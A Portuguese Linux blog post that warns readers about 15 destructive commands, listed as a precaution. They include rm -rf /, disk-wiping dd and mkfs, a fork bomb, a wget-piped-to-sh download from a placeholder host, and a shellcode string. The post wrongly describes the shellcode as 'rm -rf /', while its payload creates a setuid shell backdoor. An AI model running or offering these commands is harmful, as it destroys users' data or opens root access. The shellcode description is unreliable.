15 comandos letais que nunca devem ser executados no Linux


Neste post mostrarei 15 comandos que NUNCA DEVEM SER EXECUTADOS em nenhum distribuição GNU/Linux. Qualquer um deles causará perda de dados ou corrupção do sistema, pode congelar, desligar o sistema ou até mesmo fazê-lo parar de funcionar para sempre.

NÃO É PARA EXECUTAR NENHUM COMANDO!
ELES ESTÃO AQUI APENAS COMO ESCLARECIMENTO
PARA EVITAR QUE VOCÊ DANIFIQUE SEUS SISTEMA
E PARA EVITAR QUE VOCÊ SEJA VÍTIMA
DE USUÁRIOS LINUX SACANAS

Qualquer um desses comandos irá apagar tudo que estiver no seu diretório raiz:

01) sudo rm -rf /
02) rm -rf .*
03) dd if=/dev/zero of=/dev/sda
04) mkfs.ext3 /dev/hda
05) whatever > /dev/hda
06) cd ~; for x in `ls`; do mv -f $x $y; y=$x; done
07) find -type f -mtime +30 -exec mv {} /dev/null \;
08) mv ~ /dev/null
09) mv / /dev/null

10) O comando abaixo pode provocar o kernel panic (similar à tela azul da morte) ou congelará o sistema:

dd if=/dev/random of=/dev/port

11) Um comando que mais parece aquelas carinhas de chat, mas que também é conhecido como Bomba Fork:

:(){:|:&};:

12) Este faz o mesmo que "rm-rf /" (a diferença é que está em código decimal):

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

13) Este comando irá mover o diretório home para um lugar que realmente não existe (/dev/null é o buraco negro do Linux):

mv /home/username/* /dev/null

14) Este fará download de um script shell e executá-lo quando o download terminar ( a "|" = juntar, executar na sequência):

wget http://sumber_tak_terpercaya -O- | sh

15) Este irá impedi-lo de executar comandos com privilégios de root (outra variação do comando rm -f /):

rm -f /usr/bin/sudo;rm -f /bin/su

Veja o comando "rm -rf /" na prática:


Fonte e Creditos: aqui

0 comentários:

O conteúdo deste blog/site pode e deve ser divulgado, conforme lei a 9.610/98 meus direitos estão assegurados, portanto eu permito a copia e reprodução gratuita, seja total ou parcial, não acarretando qualquer onûs financeiro aos interessados, porém, vedo o uso para fins lucrativos, toda reprodução para o público deve citar a fonte extraída, no caso o Técnico Linux - O Espaço do Software Livre e seja citada junto com um link para a postagem original, onde a referência deve estar numa fonte de tamanho igual ou maior a do texto, obviamente que os links citados não estão sujeitos ao mesmo termo. O conteúdo textual original desta página está disponível sob a licença GNU FDL 1.2.

Todas as marcas citadas pertencem aos seus respectivos proprietários. Os direitos autorais de todas as ilustrações pertencem aos respectivos autores, e elas são reproduzidas na intenção de atender ao disposto no art. 46 da Lei 9.610 - se ainda assim alguma delas infringe direito seu, entre em contato para que possamos removê-la imediatamente ou ainda lhe dar os devidos créditos.

Copyright © 2016 O Espaço do Software Livre